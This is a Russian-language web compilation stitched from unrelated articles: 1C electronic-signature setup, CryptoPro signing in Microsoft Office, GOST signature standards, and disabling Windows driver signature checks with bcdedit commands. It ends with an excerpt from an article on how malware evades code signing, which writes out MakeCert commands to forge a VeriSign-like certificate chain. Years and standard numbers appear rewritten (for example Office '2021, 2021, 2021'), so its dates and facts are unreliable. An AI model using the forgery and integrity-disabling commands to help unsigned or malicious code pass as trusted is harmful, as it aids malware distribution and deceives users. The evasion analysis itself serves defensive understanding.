Модуль электронной подписи документов. ЗУП, ЗКГУ, КА2, БП

Что требуется для юридически значимого документооборота?

«Настоящее» использование электронного документооборота в последнее время быстрее всего развивается в области обмена юридически значимыми документами с внешними контрагентами.

Так, в налоговую инспекцию нужно сдавать счета-фактуры либо исключительно на бумаге, либо в безбумажной форме (отправленный таким образом счет-фактура автоматически становится юридически значимым документом).

Что же значит этот термин – юридически значимый документооборот?

  • В ФЗ № 149-ФЗ понятие «документированная информация» подразумевает, что кроме самой информации в документе необходимы реквизиты для ее идентификации. Кроме того, в этом же законе указано, что электронный документ как документированная информация, представленная в электронной форме», также должен содержать реквизитную часть.
  • ГОСТ Р 51141-98, описывающий стандарты делопроизводства, дает понятие юридической силы документа и дополнительно определяет понятие официального. На практике определение юридической значимости применяется только к электронным документам, а в отношении бумажных используется лишь понятие «юридической силы».
  • Закон № 63-ФЗ определяет равнозначность информации в электронном виде, подписанной квалифицированной электронной подписью, и документа на аналоговом носителе с собственноручной подписью, если закон однозначно не говорит о необходимости предоставления документа исключительно на бумаге.

После внедрения 1С:Документооборота появляется возможность поддерживать юридическую значимость электронных документов посредством поддержки электронной подписи и подсистемы интеграции с провайдерами ЭДО.

Для активации поддержки юридически значимого документооборота включаем функциональную опцию «Использовать обмен электронными документами» в пункте «Настройка обмена данными-Настроек программы».

В подсистеме можно подключиться к сервису 1С-ЭДО или 1С-Такском для использования их в качестве провайдеров ЭДО.

Здесь же настраиваются профили настроек ЭДО.

По ссылке «Настройки ЭДО» можно перейти к настройкам обмена с конкретным контрагентом.

1. Создание цифровой подписи

В главном меню выберите пункт Сервис → Параметры

В появившемся окне выберите закладку Безопасность и нажмите кнопку Цифровые подписи.

Появится окно цифровой подписи. Это окно позволяет пользователю добавить свои личные сертификаты, которые будут использоваться для формирования ЭП. Нажмите Добавить.

В появившемся окне представлен список сертификатов пользователя, установленных на компьютере.

Выберите сертификат и нажмите ОК.

Появится окно ввода пароля ключевого контейнера. Введите пароль, соответствующий контейнеру выбранного сертификата.

Если пароль введен неверно, повторите попытку. При успешном вводе пароля появится окно подтверждения подписи.

В результате подписания документа, в строке состояния в правом нижнем углу появится значок, свидетельствующий о том, что данный документ создан с ЭП.

Для проверки статуса подписи, нажмите на это значок.

При изменении подписанного документа, цифровая подпись пропадает, о чем свидетельствует сообщение:

2. Подписание документа, содержащего цифровую подпись

Для подписания документа, уже содержащего цифровую подпись, необходимо проделать шаги, аналогичные п1.

Во вкладке Сервис, выбрать Параметры. В появившемся окне на вкладке Безопасность, нажать кнопку Цифровые подписи.

Добавить сертификаты для подписания документа. Выделить сертификат и нажать ОК.

Нажатием двойного щелчка мыши на значке, свидетельствующем о подписи документа, на нижней панели задач, откроется окно Цифровая подпись. Это окно содержит информацию о подписях документа.

При внесении изменений в документ, подписи становятся недействительными, поэтому рекомендуется подписывать уже готовые документы.

Для просмотра статуса подписи, опять нажать на иконку в нижней части. Обе подписи будут недействительными.

Замечание:

При использовании отправителем и получателем одинаковой версии Microsoft Office совместимость форматов подписи обеспечивается при использовании версии КриптоПро CSP 3.0 и выше.

Если происходит открытие подписанного документа версии Microsoft Office Word 2003 в Microsoft Office Word 2007, то необходимо использовать КриптоПро CSP 3.6.1.

1. Установка «КриптоПро Office Signature»

Установка продукта «КриптоПро Office Signature» производится на компьютер с программным обеспечением:

ОС: Windows XP/2003/Vista/2008/2008 R2/7 (32 или 64 бит);

Microsoft Office 2007 или Microsoft Office 2021 (32 или 64 бит);

КриптоПро CSP 2.0 и выше.

Установка производится путём запуска дистрибутива:

XMLDSigAddIn-win32.msi (для 32-битных версий MS Office)

XMLDSigAddIn-x64.msi (для 64-битных MS Office)

2. Создание и проверка ЭП

После завершения редактирования документа и сохранения документа можно добавить к документу ЭП.

Подписанный документ будет доступен только для чтения.

Если в подписанный документ нужно внести изменения, то все созданные ЭП следует удалить из документа.

Для создания ЭП в MS Office Word 2007 или Excel 2007:

В главном меню выберите пункт Подготовить, затем Добавить цифровую подпись (КРИПТО-ПРО)

Для создания ЭП в MS Office Word 2021 или Excel 2021:

На вкладке Файл в разделе Сведения нажмите кнопку Добавить цифровую подпись (КРИПТО-ПРО)

Затем появится окно подписания документа. Это окно позволяет пользователю указать свой личный сертификат, который будет использоваться для формирования ЭП. Один из сертификатов будет выбран автоматически.

Если нужно выбрать другой сертификат — нажмите кнопку Изменить. В появившемся окне представлен список сертификатов пользователя, установленных на компьютере.

Выберите сертификат и нажмите ОК. Если для доступа к ключевому контейнеру требуется задать пароль — появится окно ввода пароля.

Если пароль введен неверно, повторите попытку. При успешном вводе пароля появится окно о статусе подписания документа.

После подписи документа, в строке состояния окна документа появится значок, свидетельствующий о том, что данный документ имеет ЭП.

Для проверки статуса подписи, нажмите на этот значок, и справа появится вкладка Подписи, в которой указан статус подписи. Для просмотра состава подписи щелкните правой кнопкой мыши на строке подписи и выберите пункт Состав подписи.

Появится более детальное сообщение о составе подписи.

При открытии измененного документа, содержащего ЭП, появится сообщение о том, что документ содержит недействительную подпись.

Для более детального просмотра статуса, нажмите на значок ЭП в строке состояния, и справа появится окно, содержащее недействительный статус подписи.

Состав подписи можно посмотреть нажатием правой кнопки мышки

3. Подписание документа, содержащего цифровую подпись

Если документ уже содержит цифровую подпись, его можно подписать еще раз.

Для добавления новой ЭП в MS Office Word 2007 или Excel 2007:

В главном меню выберите пункт Подготовить, затем Добавить цифровую подпись (КРИПТО-ПРО).

Для добавления новой ЭП в MS Office Word 2021 или Excel 2021:

На вкладке Файл в разделе Сведения нажмите кнопку Добавить цифровую подпись (КРИПТО-ПРО).

Дальнейшие действия аналогичны созданию первой подписи.

В результате на вкладке Подписи появится еще одна действительная подпись.

Для просмотра состава подписи, щелкните правой кнопкой мыши на строке нужной подписи и выберите пункт Состав подписи.

4.1 Добавление строки подписи

На вкладке Вставка в группе Текст нажмите на стрелку рядом с кнопкой Строка подписи и в появившемся меню выберите Строка подписи (КРИПТО-ПРО).

Появится диалоговое окно Настройка подписи. В нём можно ввести информацию о лице, которое будет добавлять подпись. Эти сведения будут отображены в строке подписи в документе. Заполнять все пункты необязательно.

  • в поле Предложенный подписывающий вводится ФИО подписывающего.
  • в поле Должность предложенного подписывающего — название должности подписывающего.
  • в поле Адрес электронной почты предложенного подписывающего — адрес электронной почты подписывающего
  • в поле Инструкции для подписывающего можно ввести рекомендации или требования для подписывающего. Эти инструкции отображаются в диалоговом окне Подпись, в котором подписывающий будет ставить подпись.
  • для разрешения самому подписывающему добавления комментариев в процессе создания подписи установите флажок Разрешить подписывающему добавлять примечания в окне подписи.
  • для отображения даты подписания документа, установите флажок Показывать дату подписи в строке подписи.

Нажмите кнопку ОК.

Созданная строка подписи представляет собой графический объект, который можно переместить на любое место в тексте документа.

При необходимости можно повторить добавление видимой строки подписи в случае, если документ подписывается разными людьми.

4.2 Добавление подписи в строку подписания

Дважды щелкните мышью в документе по строке подписи, в которую требуется ввести подпись. Появится диалоговое окно Подписание

В верхней части окна можно просмотреть дополнительные сведения о создаваемой подписи нажав ссылку Дополнительные сведения о том, что подписывается.

При нажатии ссылки Выбрать рисунок можно добавить изображение, например, своей рукописной подписи.

Один из имеющихся на компьютере сертификатов будет выбран автоматически.

Для выбора другого цифрового сертификата для подписи нажмите кнопку Изменить и в окне Выбор сертификата выберите необходимый сертификат

В окне Подписание нажмите кнопку Подписать. Появится информационное окно подтверждения подписи, в этом окне нажмите кнопку ОК. Для удобства работы можно установить флажок Больше не показывать это сообщение.

Созданная подпись будет отображена в документе. Одновременно будет отображена вкладка Подписи, в которой приведен список подписей в документе. Созданная подпись будет находиться в разделе Действительные подписи. Незаполненная подпись — в разделе Требуемые подписи.

После того, как в документе появилась первая (или единственная) цифровая подпись, он автоматически помечается как окончательный и доступен только для чтения.

Если документ содержит единственную подпись, то на этом работа с ним заканчивается.

Если документ содержит несколько строк подписей для нескольких лиц, документ следует передать этим лицам для подписания.

При открытии документа, содержащего незаполненные строки подписи, появляется панель сообщений.

Щелкните по кнопке Просмотр подписей, после чего на вкладке Подписи будет отображен список подписей в документе.

Для добавления подписи в строку подписи дважды щелкните по строке подписи в тексте документа или в панели Подписи нажмите правой кнопкой мыши на нужной строке подписи и выберите команду Подписать.

В окне Подписание введите необходимую информацию и нажмите кнопку Подписать

После создания последней подписи в документе в панели Подписи все подписи будут находиться в разделе Действительные подписи

4.3 Просмотр свойств подписи

В окне документа в панели Подписи щелкните по стрелке требуемой подписи и выберите команду Состав подписи. Можно также дважды щелкнуть мышью по строке подписи в тексте документа.

Свойства подписи буду отображены в соответствующем окне. Для просмотра сертификата, использовавшегося при создании подписи, нажмите кнопку Просмотр.

Подписанный документ, можно просматривать, печатать, выделять фрагменты и копировать их в буфер обмена.

Можно скопировать и строку подписи в другой документ, но эта строка подписи вставляется без цифровой подписи. Необходимо добавление подписи в строку подписи в новом документе.

При попытке сохранить подписанный документ под другим именем, появляется информационное окно:

Читайте также:  Открывают фирмы для вывода денег и берут микрозаймы: для чего мошенники крадут электронные подписи и как защитить себя — Право на

Если нажать кнопку Да, все подписи в документе станут недействительными.

Документ, содержащий цифровые подписи, автоматически помечается как окончательный. При попытке снятия этой отметки появляется информационное окно.

Если нажать кнопку Да, то любое действие по редактированию документа приведёт к тому, что все подписи в документе станут недействительными.

Тогда в строках подписи появится текст Недействительная подпись. На вкладке Подписи данные подписи будут находиться в разделе Недействительные подписи.

Документ, содержащий недействительную подпись, можно подписать повторно.

Для этого на вкладке Подписи щелкните по стрелке недействительной подписи и выберите команду Подписать еще раз. Можно также щелкнуть правой кнопкой мыши по строке подписи в тексте документа и в контекстном меню выбрать команду Подписать еще раз.

Заново заполните окно Подписание и нажмите кнопку Подписать.

5. Открытие документа на компьютере без «КриптоПро Office Signature»:

При открытии документа с подписью на компьютере, где не установлен продукт «КриптоПро Office Signature» подпись будет отображаться как недействительная. При выборе пункта Состав подписи на вкладке Подписи будет выдано информационное окно:

Если используется свд

В 1С:Документооборот есть уникальный функционал сервера внешнего документооборота, когда происходит автоматический обмен электронными документами с контрагентами, также использующими 1С:Документооборот, без промежуточных провайдеров и подключений.

Если в системе используется СВД и настроен обмен электронными документами между контрагентами с ЭП, при регистрации исходящего документа программа автоматически потребует подписать его ЭП. При поступлении входящего документа система автоматически проверит статус его ЭП.

Мы разобрали применение электронно-цифровой подписи с точки зрения пользователя 1С:Документооборот, но стоит отметить, что возможности использования ЭП не ограничиваются рамками определенной конфигурации. Юридически значимый документооборот с контрагентами и контролирующими органами, торги и прочие процессы, требующие большого количества подписей на большом количестве документов, сильно упрощаются благодаря применению ЭП.

Заголовок

В этой статье речь пойдет о настройках подписей в
конфигурациях 1С. Подробных инструкций с картинками на этот раз я выкладывать
не буду, так как сделала подробное видео на эту тему, которое находится на этой
же странице. Я сделала выводы, что показать и рассказать тему – воспринимается
легче, чем читать и искать самому. В видео ролике ввод подписантов будет
производиться в двух конфигурациях – БП 3.0 и ЗУП3.1, для того чтобы наглядно
убедиться что разница в настройках небольшая и Вы сможете все сделать
самостоятельно.

Хочу описать только ключевые моменты, а сами настройки Вы
посмотрите в видео. Самое главное, что подписи делятся на три категории:

  1. Подписи руководителей, такие как Генеральный директор или
    директор, главный бухгалтер и в этот же список включен кассир. Настройка
    выполняется прямо в справочнике «Организация», при редактировании конкретной
    организации.
  2. Подписи ответственных лиц – «Ответственные за подготовку
    отчётов». В этом случае нужно указать ФИО и должность того человека, который
    отвечает за налоговую отчетность, бухгалтерскую и статистическую.
    Этот пункт используется в конфигурациях, где ведется бухгалтерский учет и
    налоговая отчетность. Настройка также производится при редактировании
    организации.
  3. Естественно, что в конфигурации ЗУП этого пункта нет, там ответственные лица –
    это кадровые работники и специалисты по расчету заработной платы и указываются
    сразу в каждом документе.
  4. Настройки подписей через регистры: «Ответственные лица организации»
    (или в ЗУП похожий регистр «Сведения об ответственных лицах»); «Уполномоченные
    лица» (в ЗУП это  «Основания полномочий
    ответственных лиц»); «Материально ответственные лица» (тоже в конфигурациях,
    где ведется учет МОЛ). О том, куда и какие подписи вносить я подробно рассказываю
    в ролике.
  5. Настройка подписей прямо в документе. Рекомендуется основные
    подписи, то есть руководителей ввести сразу при настройке программы, а вот
    уполномоченных представителей – проще и лучше настраивать в документе, а потом
    в следующих документах просто выбирать уже введённые ранее данные.

Далее предлагаю посмотреть обучающее видео на эту тему. Если
у Вас останутся вопросы или Вас проблемы с настройкой именно в Вашей
конфигурации – задавайте вопросы.

Использование криптопро csp в word/excel из состава microsoft office 2003, 2007, 2021, 2021, 2021

Данная инструкция описывает порядок действий по конфигурации программ Word и Excel из состава Microsoft Office 2003, 2007, 2021, 2021, 2021, для создания и проверки электронных цифровых подписей документов. Цифровые подписи используют в тех случаях, когда требуется гарантировать подлинность, целостность и происхождение (авторство) документа, поэтому подписывать документ необходимо только в том случае, когда он окончательно готов.

Как настроить эцп для использования в 1с:документооборот?

Для того чтобы настроить использование ЭП в 1С:Документооборот, в первую очередь активируем эту функцию в настройках системы. Для этого в разделе «Настройка и администрирование», в «Настройках программы», выбираем пункт «Общие настройки».

В «Общих» есть опциональные функции, включающие использование электронной подписи и шифрования. Рядом находится ссылка «Настройка для данных функций». Включаем нужные нам функции – подписание с помощью ЭП и шифрование с помощью сертификатов ЭП. Далее переходим в настройку этих функций.

На первой вкладке указаны подключенные к системе сертификаты. Здесь же можно ими управлять – подключать или удалять. На следующей вкладке можно подключить и настроить криптографическое программное обеспечение удостоверяющих центров, которые обслуживают вашу компанию.

Здесь же устанавливается признак проверки подписи и сертификатов на сервере, что дает возможность проверять статус ЭП пользователям, у которых не установлено криптографическое ПО. Внизу окна есть ссылка на сайт 1С:ИТС, где описаны все необходимые настройки и инструкции.

На следующей вкладке производится настройка вставки штампа ЭП в подписанный файл формата Word.

И на последней вкладке собраны дополнительные настройки подсистемы ЭП.

Модуль электронной подписи документов. зуп, зкгу, ка2, бп

Универсальные обработкиЗагрузка и выгрузка в Excel Документооборот и делопроизводствоДокументооборот и делопроизводствоv8::УФБП2.0ERP2БП3.0УТ11КА2БУУУПлатные (руб)

Универсальная программа-обработка для распознавания ЛЮБЫХ СКАНОВ ИЛИ ФОТО ТОВАРНЫХ ДОКУМЕНТОВ и загрузки в 1С. Не требует указания параметров и предварительной настройки. Просто выбираете файл (PDF, JPG, DOC,XLS, HTML и т.д.) выбираете документ 1С и нажимаете кнопку “Распознать и загрузить”. Программа сама находит таблицу в файле, необходимые для загрузки данные в ней (номенклатура, количество, НДС, цена, сумма) и загружает ее в 1С. Вместе с номенклатурой может найти контрагента, номер и дату документа, штрих-коды, серии ГТД, страну и т.д. Распознает документы ЛЮБОЙ ФОРМЫ (УПД, ТОРГ-12, накладную, заказ клиента, установку цен и т.д.). Содержит модуль работы с электронной почтой. Для поиска таблиц используются новейшие методы OCR-нейросети. Загружает только то, что нужно, т.е. пропускает повторы шапки таблицы, заголовки, промежуточные итоги, подписи и т.д. При пополнении баланса загрузок вы получите 1 месяц бесплатной тех.поддержки.

4500 руб.

04.06.2021   
40120   
128   
95    

О новом стандарте криптографической защиты

До недавнего времени для формирования электронной подписи использовался стандарт, выпущенный в 1994 году. Он считается потенциально уязвимым, и вопрос об использовании нового подхода обсуждался достаточно давно. В 2021 году выпущено два новых стандарта – ГОСТ Р 34.

10-2021 по формированию и проверке электронной подписи и ГОСТ Р 34.11-2021 – по функции хеширования. В алгоритме формирования электронной подписи ничего нового не добавлено, но функция хеширования существенно изменилась – «Стрибог» с криптографической точки зрения существенно превосходит ту, что использовалась ранее.

Разработчики функции – ФСБ России и компания «ИнфоТеКС» – выбрали оригинальное имя для своего продукта. В древнеславянской мифологии Стрибог был богом ветра или воздуха. Кроме имени, концепт отсылок к древнеславянской культуре дополняет изящная «пасхалка».

В конце текста стандарта приведены примеры пошагового вычисления хеша для нескольких исходных значений. Одно из таких значений – шестнадцатеричное число M2 длины 576 байт из примера 2. На ЭВМ архитектуры x86 используется метод Little endian, и подобное число в памяти будет представлено в «перевернутом» виде.

Процесс перехода на новый стандарт будет организационно сложным: нужно, чтобы удостоверяющие центры могли выпускать сертификаты по новому стандарту и чтобы информационные системы обеспечивали поддержку этих сертификатов. Учитывая широкую распространенность технологии, а также то, что во многих случаях срок действия сертификата доходит до 3 лет, процесс перехода обещает быть достаточно продолжительным.

Помогла ли вам эта статья?

ДАНЕТ

Проверка цифровой подписи

В Windows 7 для проверки цифровой подписи есть специальная утилита sigverif.exe. Для ее запуска нужно в поисковой строке меню Пуск набрать sigverif.exe и нажать Ввод

В окне программы жмем Начать и она автоматически проверяет системные файлы на наличие подписей.

Результат проверки сохраняется в текстовый файл sigverif.txt. Хранится он в папке Общие документы, также его можно посмотреть прямо из окна программы, щелкнув по кнопке  Дополнительно.

Рекомендации от «1с» на переходный период

Подробная информация для партнеров и клиентов приводится в декабрьском информационном письме, а также на сайте «1С:Предприятие 8» на странице конфигурации «1С:Документооборот» (там же содержится инструкция по изменению настроек данной конфигурации).

Читайте также:  Лицензия КриптоПро: какую версию выбрать

Чтобы обеспечить непрерывное использования квалифицированных сертификатов, полученных при помощи программного продукта «1С:Подпись», заказ и выпуск новых сертификатов с 2021 года будет осуществляться только в соответствии с новым ГОСТ-2021. При этом все ранее изданные квалифицированные сертификаты будут действительны в течение всего срока их действия.

Фирма «1С» обращает внимание, что для обеспечения возможности готовить заявления и использовать сертификаты, соответствующие ГОСТ-2021, потребуется:

Если у вас был опыт выбора наименования для собственной разработки, чем вы руководствовались, выбирая имя для своей программы?

Способ 1: временное отключение проверки

Для вашего удобства мы разделим этот способ на две части. В первом случаем мы расскажем о том, как применить данный способ, если у вас установлена Windows 7 или ниже. Второй вариант подойдет лишь обладателям Windows 8, 8.1 и 10.

Если у вас Windows 7 или ниже

  1. Перезагружаем систему абсолютно любым способом.
  2. Во время перезагрузки жмем кнопку F8 для появления окна с выбором режима загрузки.
  3. В появившемся окне выбираем строку «Отключение обязательной проверки подписи драйверов» или «Disable Driver Signature Enforcement» и жмем кнопку «Enter».
  4. Временно отключаем проверку подписи в Windows 7

  5. Это позволит загрузить систему с временно отключенной проверкой драйверов на наличие подписи. Теперь остается лишь инсталлировать необходимое ПО.

Если у вас Windows 8, 8.1 или 10

  1. Перезагружаем систему, зажав предварительно клавишу «Shift» на клавиатуре.
  2. Перезагружаем Windows 10 или ниже

  3. Ждем, пока перед выключением компьютера или ноутбука не появится окно с выбором действия. В этом окне выбираем пункт «Диагностика».
  4. Выбираем пункт диагностика

  5. В следующем окне диагностики следует выбрать строку «Дополнительные параметры».
  6. Выбираем строку дополнительные параметры

  7. Следующим шагом будет выбор пункта «Параметры загрузки».
  8. Выбираем параметры загрузки

  9. В следующем окне ничего выбирать не нужно. Следует просто нажать кнопку «Перезагрузить».
  10. Начнется перезагрузка системы. В результате вы увидите окно, в котором необходимо выбрать нужные нам параметры загрузки. В нем необходимо нажать клавишу F7 для выбора строки «Отключить обязательную проверку подписи драйверов».
  11. Временно отключаем проверку подписи для Windows 10 и ниже

  12. Как и в случае с Windows 7, система загрузится с временно отключенной службой проверки подписи устанавливаемого ПО. Вы сможете инсталлировать нужный вам драйвер.

Независимо от того, какая у вас операционная система, этот способ имеет недостатки. После очередной перезагрузки системы, проверка подписей снова запустится. В некоторых случаях это может привести к блокировке работы драйверов, которые были инсталлированы без соответствующих подписей. Если такое произошло, вам следует отключить проверку насовсем. В этом вам помогут дальнейшие способы.

Способ 2: редактор групповой политики

Этот способ позволит вам отключить проверку подписей навсегда (или до того момента, как вы сами ее активируете). После этого вы сможете спокойно инсталлировать и пользоваться софтом, который не имеет соответствующего сертификата. В любом случае, этот процесс можно обратить и включить проверку подписи обратно. Так что бояться вам нечего. Кроме того, этот способ подойдет владельцам любой ОС.

  1. Жмем на клавиатуре одновременно клавиши «Windows» и «R». Запустится программа «Выполнить». В единственную строку вводим код gpedit.msc. Не забываем после этого нажать кнопку «ОК» либо «Enter».
  2. Запускаем окно групповой политики

  3. В результате откроется редактор групповой политики. В левой части окна будет находиться дерево с конфигурациями. Вам необходимо выбрать строку «Конфигурация пользователя». В открывшемся списке нажимаем два раза на папку «Административные шаблоны».
  4. Открываем раздел Административные шаблоны

  5. В открывшемся дереве открываем раздел «Система». Далее открываем содержимое папки «Установка драйвера».
  6. Открываем папку Установка драйвера

  7. В этой папке по умолчанию находятся три файла. Нас интересует файл с названием «Цифровая подпись драйверов устройств». Кликаем на этом файле два раза.
  8. Параметры цифровых подписей ПО

  9. В левой части открывшегося окна необходимо поставить галочку напротив строки «Отключено». После этого не забудьте нажать «ОК» в нижней области окна. Это позволит применить новые настройки.
  10. Окно настроек проверки подписи драйвера

  11. В результате обязательная проверка будет отключена и вы сможете инсталлировать софт без подписи. В случае необходимости в этом же окне необходимо просто установить галочку напротив строки «Включено».

Способ 3: командная строка

Этот способ весьма прост в использовании, но имеет свои недостатки, о которых мы расскажем в конце.

  1. Запускаем «Командную строку». Для этого жмем сочетание клавиш «Win» и «R». В открывшемся окне вводим команду cmd.
  2. Обращаем ваше внимание, что все способы, позволяющие открыть «Командную строку» в Windows 10, описаны в нашем отдельном уроке.
  3. Урок: Открытие командной строки в Windows 10

  4. В «Командной строке» необходимо ввести поочередно следующие команды, нажимая «Enter» после каждой из них.
  5. bcdedit.exe -set loadoptions DISABLE_INTEGRITY_CHECKS
    bcdedit.exe -set TESTSIGNING ON

  6. В результате у вас должна получиться следующая картина.
  7. Прописываем команды в Командную строку

  8. Для завершения вам необходимо лишь перезагрузить систему любым известным вам способом. После этого проверка подписи будет отключена. Минусом, о котором мы говорили в начале этого способа, является включение тестового режима системы. Он практически не отличается от обычного. Правда в правом нижнем углу вы будете постоянно видеть соответствующую надпись.
  9. Тестовый режим системы

  10. Если в будущем вам понадобиться включить обратно проверку подписей, вам необходимо лишь заменить параметр «ON» в строке bcdedit.exe -set TESTSIGNING ON на параметр «OFF». После этого снова произвести перезагрузку системы.

Обратим ваше внимание, что этот способ иногда приходится проделывать в безопасном режиме. Как запустить систему в безопасном режиме, вы можете узнать на примере нашего специального урока.

Урок: Как войти в безопасный режим в Windows

Воспользовавшись одним из предложенных способов, вы избавитесь от проблемы инсталляции сторонних драйверов. Если у вас возникли трудности с выполнением каких-либо действий, пишите об этом в комментариях к статье. Будем совместно решать возникшие трудности.

Цифровые подписи в исполняемых файлах и обход этой защиты во вредоносных программах

image

Хабрапривет!

Ну вроде как удалось решить вопросы с кармой, но они ником образом не касаются сегодняшней темы, а лишь объясняют некоторое опоздание её выхода на свет (исходные планы были на ноябрь прошлого года).

Сегодня я предлагаю Вашему вниманию небольшой обзор по системе электронных подписей исполняемых файлов и способам обхода и фальсификации этой системы. Также будет рассмотрен в деталях один из весьма действенных способов обхода. Несмотря на то, что описываемой инфе уже несколько месяцев, знают о ней не все. Производители описываемых ниже продуктов были уведомлены об описываемом материале, так что решение этой проблемы, если они вообще считают это проблемой, на их ответственности. Потому как времени было предостаточно.

ТЕОРИЯ

Идея и технология электронной подписи для исполняемых файлов возникла ещё в эпоху Windows NT. C момента появления Windows Vista компания Microsoft начала активную компанию по продвижению этой технологии. По задумке производителя, подписанный код может идти только от доверенного автора этого кода, а следовательно гарантированно не наносит вреда системе и защищён от ошибок (три ха-ха).

Тем не менее, поскольку в механизме подписи чаще всего используется довольно сложный криптоустойчивый механизм, общее доверие к подписанному коду распространилось. Не ушли от этого и антивирусные вендоры. Верно: если код подписан, то он явно не может быть вирусом, а потому ему можно доверять априори, тем самым снизив вероятность ложных срабатываний. Поэтому в большинстве современных антивирусных продуктов по умолчанию стоит обход проверки подписанных файлов, что повышает скорость сканирования и снижает вероятность ложных срабатываний. Более того, зачастую подписанные программы автоматически заносятся в категорию «доверенных» поведенческих анализаторов ака хипсов.

Становится ясно, что подписав свои творения валидной подписью, вирусмейкер получает довольно богатую аудиторию клиентов, у которых даже с активным и регулярно обновляемым антивирусом произойдёт заражение. Очевидно, что это — весьма лакомый кусочек, что легко заметно на примере уже ставшего знаменитым вируса Stuxnet, где код был подписан валидными сертификатами Realtek (позже сообщалось и о подписях от JMicron).

Но у этого подхода есть и оборотная сторона: после выявления скомпрометированной подписи она немедленно отзывается, а по самому факту подписи АВ-вендоры ставят сигнатурный детект, понятно, что с 100%-ным срабатыванием. Учитывая то, что приобрести украденный сертификат, необходимый для подписывания крайне дорого, ясно, что вирусмейкеры заинтересованы в тотальном обходе механизма проверки подписи, без валидных private-ключей или с помощью самостоятельной генерации таких ключей. Это позволит обходить защиту не только антивирусных продуктов, но и устанавливать драйвера и ActiveX-компоненты без предупреждений, да и вообще как-то пробиться в мир х64, где без подписей ничего не установить вообще.

Но об этом — подробнее на практике.

ПРАКТИКА

Кто-то из великих сказал, что чтобы опередить врага, надо начать мыслить как он. Итак, если мы вирусмейкеры, то что мы можем сделать?

1. Скопировать информацию о сертификате с какого-нибудь чистого файла.

Это наиболее популярный способ на данный момент. Копируется информация подписи до мельчайших подробностей, вплоть до цепочки доверенных издателей. Понятно, что такая копия валидна только на взгляд пользователя. Однако то, что отображает ОС вполне может сбить с толку неискушённого и быть воспринято как очередной глюк — ещё бы, если все издатели правильные, то почему это подпись невалидна? Увы и ах — таких большинство.

Читайте также:  Удостоверяющие центры электронной подписи: список 2019

2. Использовать самоподписанные сертификаты с фэйковым именем.

Аналогично выше описанному варианту за исключением того, что даже не копируется цепочка в пути сертификации.

3. Подделать MD5.

Несмотря на то, что слабость алгоритма MD5 уже давно описана (тут и тут), он до сих пор часто используется в электронных подписях. Однако реальные примеры взлома MD5 касаются или очень маленьких файлов, или приводят к неправильной работе кода. На практике не встречаются вирусы с поддельными взломанными подписями на алгоритме MD5, но тем не менее такой способ возможен теоретически.
4. Получить сертификат по обычной процедуре и использовать его в злонамеренных целях.

Одна из наиболее распространённых методик авторов так называемых riskware, adware и фэйковых антивирусов. Примером может послужить фэйковый Perfect Defender (стандартный развод: «просканируйтесь бесплатно — у вас вирус — заплатите нам и мы его удалим») существует с подписями нескольких контор:
• Jeansovi llc
• Perfect Software llc
• Sovinsky llc
• Trambambon llc

Как это делается хорошо могут рассказать наши отечественные разработчики винлокеров, мелкими буквами пишущие про «программу-шутку» и т.д., таким образом оберегаясь от статьи о мошенничестве. Так и живём…

Интересно, что реально существуют абсолютно нормальные программы с такими именами владельцев:
• Verified Software
• Genuine Software Update Limited
• Browser plugin

Понятно, что если уж этому верить, то ошибиться при первом взгляде на сертификат несложно.

Следует также отметить, что отнюдь несложно получить подпись от сертификационных центров. Например RapidSSL для проверки использует просто e-mail. Если переписка ведётся из адресов типа admin, administrator, hostmaster, info, is, it, mis, postmaster, root, ssladmin,
ssladministrator, sslwebmaster, sysadmin или webmaster@somedomain.com — очевидно, что пишет владелец домена, верно? (ещё три ха-ха). А вот славная компания Digital River (DR), промышляющая аутсорсингом и электронной коммерцией, вообще предоставляет сертификаты всем своим клиентам. Немудрено, что MSNSpyMonitor, WinFixer, QuickKeyLogger, ErrorSafe, ESurveiller, SpyBuddy, TotalSpy, Spynomore, Spypal и вообще около 0,6% из всех подписанных DR файлов являются малварью, а потенциально нежелательными являются и того больше — более 5% всех подписанных DR файлов.

Справедливости ради отмечу, что подписать х64-драйвер далеко не так просто, в этом случае пока нарушений не замечено.

5. Найти какого-нибудь работника доверенной компании и попросить его подписать Ваш код.

Без комментариев. Все любят деньги. Вопрос только в сумме 🙂

6. Украсть сертификат.

На данный момент известно три больших семейства троянцев, «заточенных», в частности, под похищение сертификатов. Это:
• Adrenalin
• Ursnif
• Zeus
• SpyEye (возможно)

Тем не менее пока не замечено массовых случаев использования украденных сертификатов в новых версиях этих троянцев. Возможно, это козырь в рукаве? Время покажет…

7. Заразить систему разработки доверенного разработчика и внедрять злонамеренный код в релизы до подписания.

Яркий пример такого заражения — вирус-концепт Induc.a. Вирус внедряет код на этапе компиляции, заражая систему разработки. В итоге разработчик даже не знает, что в его программе появился невидимый «довесок». Релиз проходит подпись и выходит в свет с полноценным сертификатом. Видишь суслика? А он есть! 😉

К счастью, Induc.a является только PoC, выполняя только заражение систем разработки без реализации какого бы то ни было дополнительного вредоносного функционала.

Ну а теперь — обещанные вкусняшки.

УЯЗВИМОСТЬ ИЛИ КАК Я ПРОВЁЛ ЭТИМ ЛЕТОМ

Как видим, вариантов обхода подписи достаточно много. В нашем примере будет рассмотрен модифицированный вариант 1 и 2, описанные выше.

Итак, что нам потребуется?
— MakeCert.exe
— cert2spc.exe
— sign.exe
— ruki.sys
— mozg.dll

Думаю, что для хабрачитателя не составит труда найти эти компоненты, но для самых ленивых выкладываю первые три здесь. Последние два не выкладываю в виду жёсткой привязки к железу, полному отсутствию кроссплатформенности и специфичности кода 🙂

Итак, создадим какой-либо сертификат доверенного издателя. Попробуем максимально скопировать информацию о том же VeriSign:
MakeCert.exe -# 7300940696719857889 -$ commercial -n CN="VeriSign Class 3 Code Signing 2009-2 CA" -a sha1 -sky signature -l "https://www.verisign.com/rpa" -cy authority -m 12 -h 2 -len 1024 -eku 1.3.6.1.5.5.7.3.2,1.3.6.1.5.5.7.3.3 -r -sv veri.pvk veri.cer

В результате выполнения мы получим veri.pvk и veri.cer, пригодные для подписывания.

Теперь создадим дочерний сертификат с использованием полученных только что:

MakeCert.exe -# 8928659211875058207 -$ commercial -n CN="Home Sweet Home" -a sha1 -sky signature -l "http://habrahabr.ru/" -ic veri.cer -iv veri.pvk -cy end -m 12 -h 2 -len 1024 -eku 1.3.6.1.5.5.7.3.3 -sv kl.pvk kl.cer

В итоге получим kl.pvk и kl.cer, которые будут доверенными сертификатами от недоверенного издателя. Цепочку можно продолжать долго, задуривая наивного пользователя. Но итог будет один: сертификат не будет валидным, потому как в цепочке есть один недоверенный элемент. НО!

